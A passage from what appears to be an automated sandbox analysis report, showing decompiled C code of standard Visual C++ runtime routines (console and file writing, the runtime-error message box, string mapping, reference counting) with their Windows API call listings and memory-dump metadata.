    						_t313 = 0x3012f80 + (_t355 >> 5) * 4;
    						_t214 =  *_t313;
    						_t352 = (_t355 & 0x0000001f) << 6;
    						_t322 =  *((intOrPtr*)(_t214 + _t352 + 0x24)) +  *((intOrPtr*)(_t214 + _t352 + 0x24)) >> 1;
    						_v6880 = _t313;
    						_v6853 = _t322;
    						__eflags = _t322 - 2;
    						if(_t322 == 2) {
    							L6:
    							_t322 =  !_a12;
    							__eflags = _t322 & 0x00000001;
    							if((_t322 & 0x00000001) != 0) {
    								L8:
    								__eflags =  *(_t214 + _t352 + 4) & 0x00000020;
    								if(( *(_t214 + _t352 + 4) & 0x00000020) != 0) {
    									E030052BA(_t322, _t355, 0, 0, 2);
    									_t362 = _t362 + 0x10;
    								}
    								_t215 = E03005C43(_t355);
    								__eflags = _t215;
    								if(_t215 == 0) {
    									L45:
    									_t325 = 0;
    									__eflags = 0;
    									goto L46;
    								} else {
    									__eflags =  *(_t352 +  *_t313 + 4) & 0x00000080;
    									if(__eflags == 0) {
    										goto L45;
    									}
    									_t267 = E03004D40(_t313, _t350, __eflags);
    									__eflags =  *( *((intOrPtr*)(_t267 + 0x6c)) + 0x14);
    									_t355 = 0 |  *( *((intOrPtr*)(_t267 + 0x6c)) + 0x14) == 0x00000000;
    									_t271 = GetConsoleMode( *(_t352 +  *_t313),  &_v6884);
    									_t325 = 0;
    									__eflags = _t271;
    									if(_t271 == 0) {
    										L46:
    										_t216 =  *_t313;
    										__eflags =  *(_t216 + _t352 + 4) & 0x00000080;
    										if(( *(_t216 + _t352 + 4) & 0x00000080) == 0) {
    											_t217 = WriteFile( *(_t216 + _t352), _v6864, _a12,  &_v6876, _t325);
    											__eflags = _t217;
    											if(_t217 == 0) {
    												L85:
    												_v6848 = GetLastError();
    												L86:
    												__eflags = _v6860;
    												if(_v6860 != 0) {
    													_t220 = _v6860 - _v6868;
    													__eflags = _v6860 - _v6868;
    													L97:
    													_pop(_t312);
    													L98:
    													return E03006BA0(_t220, _t312, _v8 ^ _t361, _t350, _t352, _t355);
    												}
    												L87:
    												__eflags = _v6848;
    												if(_v6848 == 0) {
    													L91:
    													_t223 =  *_v6880;
    													__eflags =  *(_t352 + _t223 + 4) & 0x00000040;
    													if(( *(_t352 + _t223 + 4) & 0x00000040) == 0) {
    														L94:
    														 *((intOrPtr*)(E03003EA5())) = 0x1c;
    														_t225 = E03003EB8();
    														 *_t225 =  *_t225 & 0x00000000;
    														__eflags =  *_t225;
    														L95:
    														_t220 = _t225 | 0xffffffff;
    														goto L97;
    													}
    													__eflags =  *_v6864 - 0x1a;
    													if( *_v6864 != 0x1a) {
    														goto L94;
    													}
    													_t220 = 0;
    													goto L97;
    												}
    												_t355 = 5;
    												__eflags = _v6848 - _t355;
    												if(_v6848 != _t355) {
    													_t225 = E03003ECB(_v6848);
    												} else {
    													 *((intOrPtr*)(E03003EA5())) = 9;
    													_t225 = E03003EB8();
    													 *_t225 = _t355;
    												}
    												goto L95;
    											}
    											_v6848 = _v6848 & 0x00000000;
    											_v6860 = _v6876;
    											goto L86;
    										}
    										__eflags = _v6853;
    										_v6848 = _t325;
    										if(_v6853 != 0) {
    											__eflags = _v6853 - 2;
    											if(_v6853 != 2) {
    												_v6872 = _v6864;
    												__eflags = _a12 - _t325;
    												if(_a12 <= _t325) {
    													goto L91;
    												} else {
    													goto L70;
    												}
    												do {
    													L70:
    													_v6852 = _v6852 & 0x00000000;
    													_t331 = _v6872 - _v6864;
    													__eflags = _t331;
    													_t230 =  &_v1724;
    													_t356 = 2;
    													do {
    														__eflags = _t331 - _a12;
    														if(_t331 >= _a12) {
    															break;
    														}
    														_t350 =  *_v6872 & 0x0000ffff;
    														_v6872 = _v6872 + _t356;
    														_t331 = _t331 + _t356;
    														__eflags = _t350 - 0xa;
    														if(_t350 == 0xa) {
    															_t315 = 0xd;
    															 *_t230 = _t315;
    															_t230 = _t230 + _t356;
    															_t167 =  &_v6852;
    															 *_t167 = _v6852 + _t356;
    															__eflags =  *_t167;
    														}
    														_v6852 = _v6852 + _t356;
    														 *_t230 = _t350;
    														_t230 = _t230 + _t356;
    														__eflags = _v6852 - 0x6a8;
    													} while (_v6852 < 0x6a8);
    													_t355 = 0;
    													asm("cdq");
    													_t314 = WideCharToMultiByte(0xfde9, 0,  &_v1724, _t230 -  &_v1724 - _t350 >> 1,  &_v5140, 0xd55, 0, 0);
    													__eflags = _t314;
    													if(_t314 == 0) {
    														goto L85;
    													} else {
    														goto L76;
    													}
    													while(1) {
    														L76:
    														_t242 = WriteFile( *(_t352 +  *_v6880), _t361 + _t355 - 0x1410, _t314 - _t355,  &_v6876, 0);
    														__eflags = _t242;
    														if(_t242 == 0) {
    															break;
    														}
    														_t355 = _t355 + _v6876;
    														__eflags = _t314 - _t355;
    														if(_t314 > _t355) {
    															continue;
    														}
    														L80:
    														__eflags = _t314 - _t355;
    														if(_t314 > _t355) {
    															goto L86;
    														}
    														goto L81;
    													}
    													_v6848 = GetLastError();
    													goto L80;
    													L81:
    													_t245 = _v6872 - _v6864;
    													_v6860 = _t245;
    													__eflags = _t245 - _a12;
    												} while (_t245 < _a12);
    												goto L86;
    											}
    											_t316 = _v6864;
    											__eflags = _a12 - _t325;
    											if(_a12 <= _t325) {
    												goto L91;
    											} else {
    												goto L60;
    											}
    											do {
    												L60:
    												_v6852 = _v6852 & 0x00000000;
    												_t335 = _t316 - _v6864;
    												__eflags = _t335;
    												_t246 =  &_v6844;
    												_t357 = 2;
    												do {
    													__eflags = _t335 - _a12;
    													if(_t335 >= _a12) {
    														break;
    													}
    													_t350 =  *_t316 & 0x0000ffff;
    													_t316 = _t316 + _t357;
    													_t335 = _t335 + _t357;
    													_v6884 = _t316;
    													__eflags = _t350 - 0xa;
    													if(_t350 == 0xa) {
    														_v6868 = _v6868 + _t357;
    														_t317 = 0xd;
    														 *_t246 = _t317;
    														_t316 = _v6884;
    														_t246 = _t246 + _t357;
    														_t140 =  &_v6852;
    														 *_t140 = _v6852 + _t357;
    														__eflags =  *_t140;
    													}
    													_v6852 = _v6852 + _t357;
    													 *_t246 = _t350;
    													_t246 = _t246 + _t357;
    													__eflags = _v6852 - 0x13fe;
    												} while (_v6852 < 0x13fe);
    												_t355 = _t246 -  &_v6844;
    												_t252 = WriteFile( *(_t352 +  *_v6880),  &_v6844, _t355,  &_v6876, 0);
    												__eflags = _t252;
    												if(_t252 == 0) {
    													goto L85;
    												}
    												_t253 = _v6876;
    												_v6860 = _v6860 + _t253;
    												__eflags = _t253 - _t355;
    												if(_t253 < _t355) {
    													goto L86;
    												}
    												__eflags = _t316 - _v6864 - _a12;
    											} while (_t316 - _v6864 < _a12);
    											goto L86;
    										}
    										_t318 = _v6864;
    										__eflags = _a12 - _t325;
    										if(_a12 <= _t325) {
    											goto L91;
    										} else {
    											goto L49;
    										}
    										do {
    											L49:
    											_t359 = 0;
    											_t337 = _t318 - _v6864;
    											__eflags = _t337;
    											_t256 =  &_v6844;
    											do {
    												__eflags = _t337 - _a12;
    												if(_t337 >= _a12) {
    													break;
    												}
    												_t350 =  *_t318;
    												_t318 = _t318 + 1;
    												_t337 = _t337 + 1;
    												_v6884 = _t318;
    												__eflags = _t350 - 0xa;
    												if(_t350 == 0xa) {
    													_v6868 =  &(_v6868->Internal);
    													 *_t256 = 0xd;
    													_t256 =  &(_t256[0]);
    													_t359 = _t359 + 1;
    													__eflags = _t359;
    												}
    												 *_t256 = _t350;
    												_t256 =  &(_t256[0]);
    												_t359 = _t359 + 1;
    												__eflags = _t359 - 0x13ff;
    											} while (_t359 < 0x13ff);
    											_t355 = _t256 -  &_v6844;
    											_t262 = WriteFile( *(_t352 +  *_v6880),  &_v6844, _t355,  &_v6876, 0);
    											__eflags = _t262;
    											if(_t262 == 0) {
    												goto L85;
    											}
    											_t263 = _v6876;
    											_v6860 = _v6860 + _t263;
    											__eflags = _t263 - _t355;
    											if(_t263 < _t355) {
    												goto L86;
    											}
    											__eflags = _t318 - _v6864 - _a12;
    										} while (_t318 - _v6864 < _a12);
    										goto L86;
    									}
    									__eflags = _t355;
    									if(_t355 == 0) {
    										L15:
    										_t272 = GetConsoleCP();
    										_t319 = _v6864;
    										_v6884 = _t272;
    										_v6872 = 0;
    										__eflags = _a12;
    										if(_a12 <= 0) {
    											goto L87;
    										}
    										_v6852 = 0;
    										do {
    											_t274 = _v6853;
    											__eflags = _t274;
    											if(_t274 != 0) {
    												__eflags = _t274 - 1;
    												if(_t274 == 1) {
    													L35:
    													_t355 =  *_t319 & 0x0000ffff;
    													__eflags = _t355 - 0xa;
    													_t325 = 0 | _t355 == 0x0000000a;
    													_t319 =  &(_t319[1]);
    													_t81 =  &_v6852;
    													 *_t81 = _v6852 + 2;
    													__eflags =  *_t81;
    													_v6848 = _t355;
    													_v6888 = _t355 == 0xa;
    													L36:
    													__eflags = _t274 - 1;
    													if(_t274 == 1) {
    														L38:
    														_t275 = E03007D97(_t325, _v6848);
    														_pop(_t325);
    														__eflags = _t275 - _v6848;
    														if(_t275 != _v6848) {
    															goto L85;
    														}
    														_v6860 = _v6860 + 2;
    														__eflags = _v6888;
    														if(_v6888 == 0) {
    															goto L42;
    														}
    														_t277 = 0xd;
    														_v6848 = _t277;
    														_t278 = E03007D97(_t325, _t277);
    														_pop(_t325);
    														__eflags = _t278 - _v6848;
    														if(_t278 != _v6848) {
    															goto L85;
    														}
    														_v6860 = _v6860 + 1;
    														_t94 =  &_v6868;
    														 *_t94 =  &(_v6868->Internal);
    														__eflags =  *_t94;
    														goto L42;
    													}
    													__eflags = _t274 - 2;
    													if(_t274 != 2) {
    														goto L42;
    													}
    													goto L38;
    												}
    												__eflags = _t274 - 2;
    												if(_t274 != 2) {
    													goto L36;
    												}
    												goto L35;
    											}
    											_t341 =  *_t319;
    											_t355 = _v6880;
    											__eflags = _t341 - 0xa;
    											_v6888 = 0 | _t341 == 0x0000000a;
    											_t282 =  *_t355 + _t352;
    											__eflags =  *(_t282 + 0x38);
    											if( *(_t282 + 0x38) == 0) {
    												_t284 = E03006B8D(_t341);
    												__eflags = _t284;
    												if(_t284 == 0) {
    													_push(1);
    													_push(_t319);
    													L25:
    													_push( &_v6848);
    													_t286 = E03007EEF();
    													_t362 = _t362 + 0xc;
    													__eflags = _t286 - 0xffffffff;
    													if(_t286 == 0xffffffff) {
    														goto L86;
    													}
    													L26:
    													_t319 =  &(_t319[0]);
    													_v6852 = _v6852 + 1;
    													_t355 = WideCharToMultiByte(_v6884, 0,  &_v6848, 1,  &_v16, 5, 0, 0);
    													__eflags = _t355;
    													if(_t355 == 0) {
    														goto L86;
    													}
    													_t293 = WriteFile( *(_t352 +  *_v6880),  &_v16, _t355,  &_v6872, 0);
    													__eflags = _t293;
    													if(_t293 == 0) {
    														goto L85;
    													}
    													_t325 = _v6868;
    													_v6860 = _v6852 + _v6868;
    													__eflags = _v6872 - _t355;
    													if(_v6872 < _t355) {
    														goto L86;
    													}
    													__eflags = _v6888;
    													if(_v6888 == 0) {
    														goto L42;
    													}
    													_v16 = 0xd;
    													_t300 = WriteFile( *(_t352 +  *_v6880),  &_v16, 1,  &_v6872, 0);
    													__eflags = _t300;
    													if(_t300 == 0) {
    														goto L85;
    													}
    													__eflags = _v6872 - 1;
    													if(_v6872 < 1) {
    														goto L86;
    													}
    													_v6868 =  &(_v6868->Internal);
    													_v6860 = _v6860 + 1;
    													goto L42;
    												}
    												__eflags = _v6864 - _t319 + _a12 - 1;
    												if(_v6864 - _t319 + _a12 <= 1) {
    													_t350 =  *_t319;
    													_v6860 = _v6860 + 1;
    													 *((char*)(_t352 +  *_t355 + 0x34)) =  *_t319;
    													 *((intOrPtr*)(_t352 +  *_t355 + 0x38)) = 1;
    													goto L86;
    												}
    												_t304 = E03007EEF( &_v6848, _t319, 2);
    												_t362 = _t362 + 0xc;
    												__eflags = _t304 - 0xffffffff;
    												if(_t304 == 0xffffffff) {
    													goto L86;
    												}
    												_t319 =  &(_t319[0]);
    												_v6852 = _v6852 + 1;
    												goto L26;
    											}
    											_t350 =  *((intOrPtr*)(_t282 + 0x34));
    											_v16 =  *((intOrPtr*)(_t282 + 0x34));
    											_v15 = _t341;
    											 *(_t282 + 0x38) =  *(_t282 + 0x38) & 0x00000000;
    											_push(2);
    											_push( &_v16);
    											goto L25;
    											L42:
    											__eflags = _v6852 - _a12;
    										} while (_v6852 < _a12);
    										goto L86;
    									}
    									__eflags = _v6853;
    									if(_v6853 == 0) {
    										goto L46;
    									}
    									goto L15;
    								}
    							}
    							 *(E03003EB8()) =  *_t307 & 0x00000000;
    							 *((intOrPtr*)(E03003EA5())) = 0x16;
    							_t225 = E03003E53();
    							goto L95;
    						}
    						__eflags = _t322 - 1;
    						if(_t322 != 1) {
    							goto L8;
    						}
    						goto L6;
    					}
    					 *(E03003EB8()) = 0;
    					 *((intOrPtr*)(E03003EA5())) = 0x16;
    					_t220 = E03003E53() | 0xffffffff;
    					goto L98;
    				}
    				_t220 = 0;
    				goto L98;
    			}

    APIs
    • __getptd.LIBCMT ref: 0300551B
      • Part of subcall function 03004D40: __amsg_exit.LIBCMT ref: 03004D50
    • GetConsoleMode.KERNEL32(?,?), ref: 03005539
    • GetConsoleCP.KERNEL32 ref: 03005559
      • Part of subcall function 03006B8D: __isleadbyte_l.LIBCMT ref: 03006B97
    • __Stoull.NTSTC_LIBCMT ref: 030055F3
    • __Stoull.NTSTC_LIBCMT ref: 03005617
    • WideCharToMultiByte.KERNEL32(?,00000000,?,00000001,?,00000005,00000000,00000000), ref: 03005649
    • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 03005672
    • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 030056CB
      • Part of subcall function 03007D97: ___initconout.LIBCMT ref: 03007DA6
      • Part of subcall function 03007D97: WriteConsoleW.KERNEL32(FFFFFFFE,?,00000001,00000000,00000000), ref: 03007DC9
    • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 03005839
    • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 03005913
    • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,?,?,00000D55,00000000,00000000), ref: 030059E3
    • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 03005A14
    • GetLastError.KERNEL32 ref: 03005A2A
    • WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 03005A6B
    • GetLastError.KERNEL32(?,03005BBB,?,?,?,030098B8,00000010,03002FCE,?,?,00000001,?,?,?,?), ref: 03005A8A
      • Part of subcall function 03006BA0: IsDebuggerPresent.KERNEL32 ref: 03008C43
      • Part of subcall function 03006BA0: SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 03008C58
      • Part of subcall function 03006BA0: UnhandledExceptionFilter.KERNEL32(03002930), ref: 03008C63
      • Part of subcall function 03006BA0: GetCurrentProcess.KERNEL32(C0000409), ref: 03008C7F
      • Part of subcall function 03006BA0: TerminateProcess.KERNEL32(00000000), ref: 03008C86
      • Part of subcall function 030052BA: SetFilePointer.KERNEL32(00000000,?,00000000,030034EA,?,?,?,?,?,030054FC,?,00000000,00000000,00000002,?,00000001), ref: 030052FC
      • Part of subcall function 030052BA: GetLastError.KERNEL32(?,030054FC,?,00000000,00000000,00000002,?,00000001,?,?,03005BBB,?,?,?,030098B8,00000010), ref: 03005309
    Memory Dump Source
    • Source File: 00000001.00000002.1453782213.03001000.00000020.sdmp, Offset: 03000000, based on PE: true
    • Associated: 00000001.00000002.1453773664.03000000.00000002.sdmp
    • Associated: 00000001.00000002.1453789983.0300B000.00000004.sdmp
    • Associated: 00000001.00000002.1453799273.03014000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_3000000_obtG43AWHP.jbxd
    C-Code - Quality: 78%
    			E0300424F(void* __edx, void* _a4) {
    				signed int _v8;
    				struct HINSTANCE__* _v9;
    				void _v508;
    				long _v512;
    				void* __ebx;
    				void* __edi;
    				void* __esi;
    				signed int _t18;
    				signed int _t23;
    				short _t28;
    				void* _t32;
    				void* _t34;
    				void* _t37;
    				long _t38;
    				void* _t39;
    				struct HINSTANCE__* _t40;
    				void* _t52;
    				long _t53;
    				void* _t54;
    				signed int _t55;
    				void* _t56;
    				void* _t57;
    
    				_t52 = __edx;
    				_t18 =  *0x300bbe4; // 0x1979767b
    				_v8 = _t18 ^ _t55;
    				_t54 = _a4;
    				_t53 = E03004229(_t54);
    				_t40 = 0;
    				_v512 = _t53;
    				if(_t53 != 0) {
    					if(E030076D8(3) == 1 || E030076D8(3) == 0 &&  *0x300b000 == 1) {
    						_t54 = GetStdHandle(0xfffffff4);
    						if(_t54 != _t40 && _t54 != 0xffffffff) {
    							_t23 = 0;
    							while(1) {
    								 *((char*)(_t55 + _t23 - 0x1f8)) =  *((intOrPtr*)(_t53 + _t23 * 2));
    								if( *((intOrPtr*)(_t53 + _t23 * 2)) == _t40) {
    									break;
    								}
    								_t23 = _t23 + 1;
    								if(_t23 < 0x1f4) {
    									continue;
    								}
    								break;
    							}
    							_v9 = _t40;
    							_t20 = WriteFile(_t54,  &_v508, E03002C60( &_v508),  &_v512, _t40);
    						}
    					} else {
    						if(_t54 != 0xfc) {
    							_t53 = 0x300be08;
    							_t28 = E03007675(0x300be08, 0x314, L"Runtime Error!\n\nProgram: ");
    							_t57 = _t56 + 0xc;
    							if(_t28 != 0) {
    								_push(_t40);
    								_push(_t40);
    								_push(_t40);
    								_push(_t40);
    								_push(_t40);
    								goto L9;
    							} else {
    								_t54 = 0x300be3a;
    								 *0x300c042 = _t28;
    								_t38 = GetModuleFileNameW(_t40, 0x300be3a, 0x104);
    								_t40 = 0x2fb;
    								if(_t38 == 0) {
    									_t39 = E03007675(0x300be3a, 0x2fb, L"<program name unknown>");
    									_t57 = _t57 + 0xc;
    									if(_t39 != 0) {
    										L8:
    										_push(0);
    										_push(0);
    										_push(0);
    										_push(0);
    										_push(0);
    										L9:
    										E03003E01();
    									}
    								}
    							}
    							if(E0300765A(_t54) + 1 > 0x3c) {
    								_t40 = _t40 - (0x300bdc4 + E0300765A(_t54) * 2 - _t54 >> 1);
    								_t37 = E0300758D(0x300bdc4 + E0300765A(_t54) * 2, _t40, L"...", 3);
    								_t57 = _t57 + 0x14;
    								if(_t37 != 0) {
    									goto L8;
    								}
    							}
    							_t54 = 0x314;
    							_t32 = E03007518(_t53, 0x314, L"\n\n");
    							_t57 = _t57 + 0xc;
    							if(_t32 != 0) {
    								goto L8;
    							}
    							_t34 = E03007518(_t53, 0x314, _v512);
    							_t57 = _t57 + 0xc;
    							if(_t34 != 0) {
    								goto L8;
    							}
    							_t20 = E030073AC(_t52, _t53, L"Microsoft Visual C++ Runtime Library", 0x12010);
    						}
    					}
    				}
    				return E03006BA0(_t20, _t40, _v8 ^ _t55, _t52, _t53, _t54);
    			}

    APIs
    • GetModuleFileNameW.KERNEL32(00000000,0300BE3A,00000104,00000001,00000000,?), ref: 030042EB
      • Part of subcall function 03003E01: GetCurrentProcess.KERNEL32(C0000417,03002BF3), ref: 03003E17
      • Part of subcall function 03003E01: TerminateProcess.KERNEL32(00000000), ref: 03003E1E
    • _wcslen.LIBCMT ref: 0300431A
    • _wcslen.LIBCMT ref: 03004327
      • Part of subcall function 030073AC: LoadLibraryW.KERNEL32(USER32.DLL), ref: 030073E7
      • Part of subcall function 030073AC: GetProcAddress.KERNEL32(00000000,MessageBoxW), ref: 03007403
      • Part of subcall function 030073AC: EncodePointer.KERNEL32(00000000), ref: 03007414
      • Part of subcall function 030073AC: GetProcAddress.KERNEL32(00000000,GetActiveWindow), ref: 03007421
      • Part of subcall function 030073AC: EncodePointer.KERNEL32(00000000), ref: 03007424
      • Part of subcall function 030073AC: GetProcAddress.KERNEL32(00000000,GetLastActivePopup), ref: 03007431
      • Part of subcall function 030073AC: EncodePointer.KERNEL32(00000000), ref: 03007434
      • Part of subcall function 030073AC: GetProcAddress.KERNEL32(00000000,GetUserObjectInformationW), ref: 03007441
      • Part of subcall function 030073AC: EncodePointer.KERNEL32(00000000), ref: 03007444
      • Part of subcall function 030073AC: GetProcAddress.KERNEL32(00000000,GetProcessWindowStation), ref: 03007455
      • Part of subcall function 030073AC: EncodePointer.KERNEL32(00000000), ref: 03007458
      • Part of subcall function 030073AC: DecodePointer.KERNEL32(00000000,0300BE08,00000314,00000000), ref: 0300747A
      • Part of subcall function 030073AC: DecodePointer.KERNEL32 ref: 03007484
      • Part of subcall function 030073AC: DecodePointer.KERNEL32(?,0300BE08,00000314,00000000), ref: 030074C3
      • Part of subcall function 030073AC: DecodePointer.KERNEL32(?), ref: 030074DD
      • Part of subcall function 030073AC: DecodePointer.KERNEL32(0300BE08,00000314,00000000), ref: 030074F1
    • GetStdHandle.KERNEL32(000000F4,00000001,00000000,?), ref: 0300439D
    • _strlen.LIBCMT ref: 030043DA
    • WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 030043E9
      • Part of subcall function 03006BA0: IsDebuggerPresent.KERNEL32 ref: 03008C43
      • Part of subcall function 03006BA0: SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 03008C58
      • Part of subcall function 03006BA0: UnhandledExceptionFilter.KERNEL32(03002930), ref: 03008C63
      • Part of subcall function 03006BA0: GetCurrentProcess.KERNEL32(C0000409), ref: 03008C7F
      • Part of subcall function 03006BA0: TerminateProcess.KERNEL32(00000000), ref: 03008C86
    Strings
    Memory Dump Source
    • Source File: 00000001.00000002.1453782213.03001000.00000020.sdmp, Offset: 03000000, based on PE: true
    • Associated: 00000001.00000002.1453773664.03000000.00000002.sdmp
    • Associated: 00000001.00000002.1453789983.0300B000.00000004.sdmp
    • Associated: 00000001.00000002.1453799273.03014000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_3000000_obtG43AWHP.jbxd
    C-Code - Quality: 79%
    			E0300818A(intOrPtr* _a4, int _a8, signed int _a12, char* _a16, int _a20, short* _a24, int _a28, int _a32, intOrPtr _a36) {
    				signed int _v8;
    				int _v12;
    				int _v16;
    				int _v20;
    				void* _v32;
    				void* __ebx;
    				void* __edi;
    				void* __esi;
    				signed int _t67;
    				int _t73;
    				short* _t75;
    				short* _t77;
    				short* _t78;
    				signed int _t81;
    				void* _t83;
    				int _t84;
    				int _t86;
    				signed int _t88;
    				void* _t90;
    				short* _t91;
    				char* _t96;
    				int _t99;
    				signed int _t108;
    				signed int _t109;
    				int _t112;
    				signed int _t113;
    				signed int _t115;
    				int _t116;
    
    				_t67 =  *0x300bbe4; // 0x1979767b
    				_v8 = _t67 ^ _t115;
    				_t109 = _a20;
    				if(_t109 <= 0) {
    					L8:
    					_v12 = 0;
    					if(_a32 == 0) {
    						_a32 =  *((intOrPtr*)( *_a4 + 4));
    					}
    					_t114 = MultiByteToWideChar;
    					_t112 = MultiByteToWideChar(_a32, 1 + (0 | _a36 != 0x00000000) * 8, _a16, _a20, 0, 0);
    					_v20 = _t112;
    					if(_t112 != 0) {
    						if(__eflags <= 0) {
    							L21:
    							_v16 = 0;
    							L22:
    							__eflags = _v16;
    							if(_v16 == 0) {
    								goto L11;
    							}
    							_t75 = MultiByteToWideChar(_a32, 1, _a16, _a20, _v16, _t112);
    							__eflags = _t75;
    							if(_t75 == 0) {
    								L45:
    								E0300816A(_v16);
    								_t73 = _v12;
    								goto L46;
    							}
    							_t114 = LCMapStringW;
    							_t77 = LCMapStringW(_a8, _a12, _v16, _t112, 0, 0);
    							_v12 = _t77;
    							__eflags = _t77;
    							if(_t77 == 0) {
    								goto L45;
    							}
    							__eflags = _a12 & 0x00000400;
    							if((_a12 & 0x00000400) == 0) {
    								_t113 = _v12;
    								__eflags = _t113;
    								if(_t113 <= 0) {
    									L37:
    									_t112 = 0;
    									__eflags = 0;
    									L38:
    									__eflags = _t112;
    									if(_t112 != 0) {
    										_t78 = LCMapStringW(_a8, _a12, _v16, _v20, _t112, _v12);
    										__eflags = _t78;
    										if(_t78 != 0) {
    											_push(0);
    											_push(0);
    											__eflags = _a28;
    											if(_a28 != 0) {
    												_push(_a28);
    												_push(_a24);
    											} else {
    												_push(0);
    												_push(0);
    											}
    											_v12 = WideCharToMultiByte(_a32, 0, _t112, _v12, ??, ??, ??, ??);
    										}
    										E0300816A(_t112);
    									}
    									goto L45;
    								}
    								_t81 = 0xffffffe0;
    								_t109 = _t81 % _t113;
    								__eflags = _t81 / _t113 - 2;
    								if(_t81 / _t113 < 2) {
    									goto L37;
    								}
    								_t83 = _t113 + _t113 + 8;
    								__eflags = _t83 - 0x400;
    								if(_t83 > 0x400) {
    									_t84 = E030089C5(_t109, _t113, LCMapStringW, _t83);
    									__eflags = _t84;
    									if(_t84 != 0) {
    										 *_t84 = 0xdddd;
    										_t84 = _t84 + 8;
    										__eflags = _t84;
    									}
    									_t112 = _t84;
    									goto L38;
    								}
    								E03009200(_t83);
    								_t112 = _t116;
    								__eflags = _t112;
    								if(_t112 == 0) {
    									goto L45;
    								}
    								 *_t112 = 0xcccc;
    								_t112 = _t112 + 8;
    								goto L38;
    							}
    							_t86 = _a28;
    							__eflags = _t86;
    							if(_t86 != 0) {
    								__eflags = _v12 - _t86;
    								if(_v12 <= _t86) {
    									LCMapStringW(_a8, _a12, _v16, _t112, _a24, _t86);
    								}
    							}
    							goto L45;
    						}
    						_t88 = 0xffffffe0;
    						_t109 = _t88 % _t112;
    						__eflags = _t88 / _t112 - 2;
    						if(_t88 / _t112 < 2) {
    							goto L21;
    						}
    						_t24 = _t112 + 8; // 0x8
    						_t90 = _t112 + _t24;
    						__eflags = _t90 - 0x400;
    						if(_t90 > 0x400) {
    							_t91 = E030089C5(_t109, _t112, MultiByteToWideChar, _t90);
    							__eflags = _t91;
    							if(_t91 == 0) {
    								L20:
    								_v16 = _t91;
    								goto L22;
    							}
    							 *_t91 = 0xdddd;
    							L19:
    							_t91 =  &(_t91[4]);
    							__eflags = _t91;
    							goto L20;
    						}
    						E03009200(_t90);
    						_t91 = _t116;
    						__eflags = _t91;
    						if(_t91 == 0) {
    							goto L20;
    						}
    						 *_t91 = 0xcccc;
    						goto L19;
    					} else {
    						L11:
    						_t73 = 0;
    						L46:
    						return E03006BA0(_t73, 0, _v8 ^ _t115, _t109, _t112, _t114);
    					}
    				} else {
    					_t96 = _a16;
    					_t108 = _t109;
    					while(1) {
    						_t108 = _t108 - 1;
    						if( *_t96 == 0) {
    							break;
    						}
    						_t96 =  &(_t96[1]);
    						if(_t108 != 0) {
    							continue;
    						} else {
    							_t108 = _t108 | 0xffffffff;
    							break;
    						}
    					}
    					_t99 = _t109 - _t108 - 1;
    					if(_t99 < _t109) {
    						_t99 = _t99 + 1;
    					}
    					_a20 = _t99;
    					goto L8;
    				}
    			}

    APIs
    • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000100,?,00000000,?,?,?,?,?,00000000), ref: 030081FB
    • MultiByteToWideChar.KERNEL32(?,00000001,00000000,?,?,00000000,?,00000000,?,?,?,?,?,00000000), ref: 03008269
    • LCMapStringW.KERNEL32(?,?,?,00000000,00000000,00000000,?,00000000,?,?,?,?,?,00000000), ref: 03008285
    • LCMapStringW.KERNEL32(?,?,?,00000000,?,?,?,00000000,?,?,?,?,?,00000000), ref: 030082BE
      • Part of subcall function 030089C5: HeapAlloc.KERNEL32(00000000,00000001,00000001,00000000,00000000,?,030068FF,?,00000001,?,?,03006E19,00000018,03009958,0000000C,03006EA9), ref: 03008A0A
    • LCMapStringW.KERNEL32(?,?,?,?,00000000,?,?,00000000,?,?,?,?,?,00000000), ref: 03008324
    • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,00000000,?,?,?,?,?,00000000), ref: 03008343
    • __freea.LIBCMT ref: 0300834D
    • __freea.LIBCMT ref: 03008356
      • Part of subcall function 03006BA0: IsDebuggerPresent.KERNEL32 ref: 03008C43
      • Part of subcall function 03006BA0: SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 03008C58
      • Part of subcall function 03006BA0: UnhandledExceptionFilter.KERNEL32(03002930), ref: 03008C63
      • Part of subcall function 03006BA0: GetCurrentProcess.KERNEL32(C0000409), ref: 03008C7F
      • Part of subcall function 03006BA0: TerminateProcess.KERNEL32(00000000), ref: 03008C86
    Memory Dump Source
    • Source File: 00000001.00000002.1453782213.03001000.00000020.sdmp, Offset: 03000000, based on PE: true
    • Associated: 00000001.00000002.1453773664.03000000.00000002.sdmp
    • Associated: 00000001.00000002.1453789983.0300B000.00000004.sdmp
    • Associated: 00000001.00000002.1453799273.03014000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_3000000_obtG43AWHP.jbxd
    C-Code - Quality: 100%
    			E030065E7(LONG* _a4) {
    				LONG* _t16;
    				LONG* _t17;
    				LONG* _t18;
    				LONG* _t19;
    				LONG* _t20;
    				LONG* _t21;
    				long* _t32;
    				LONG* _t34;
    
    				_t34 = _a4;
    				if(_t34 == 0) {
    					L18:
    					return _t34;
    				}
    				InterlockedDecrement(_t34);
    				_t16 = _t34[0x2c];
    				if(_t16 != 0) {
    					InterlockedDecrement(_t16);
    				}
    				_t17 = _t34[0x2e];
    				if(_t17 != 0) {
    					InterlockedDecrement(_t17);
    				}
    				_t18 = _t34[0x2d];
    				if(_t18 != 0) {
    					InterlockedDecrement(_t18);
    				}
    				_t19 = _t34[0x30];
    				if(_t19 != 0) {
    					InterlockedDecrement(_t19);
    				}
    				_t32 =  &(_t34[0x14]);
    				_a4 = 6;
    				do {
    					if( *((intOrPtr*)(_t32 - 8)) != 0x300b974) {
    						_t20 =  *_t32;
    						if(_t20 != 0) {
    							InterlockedDecrement(_t20);
    						}
    					}
    					if( *((intOrPtr*)(_t32 - 4)) != 0) {
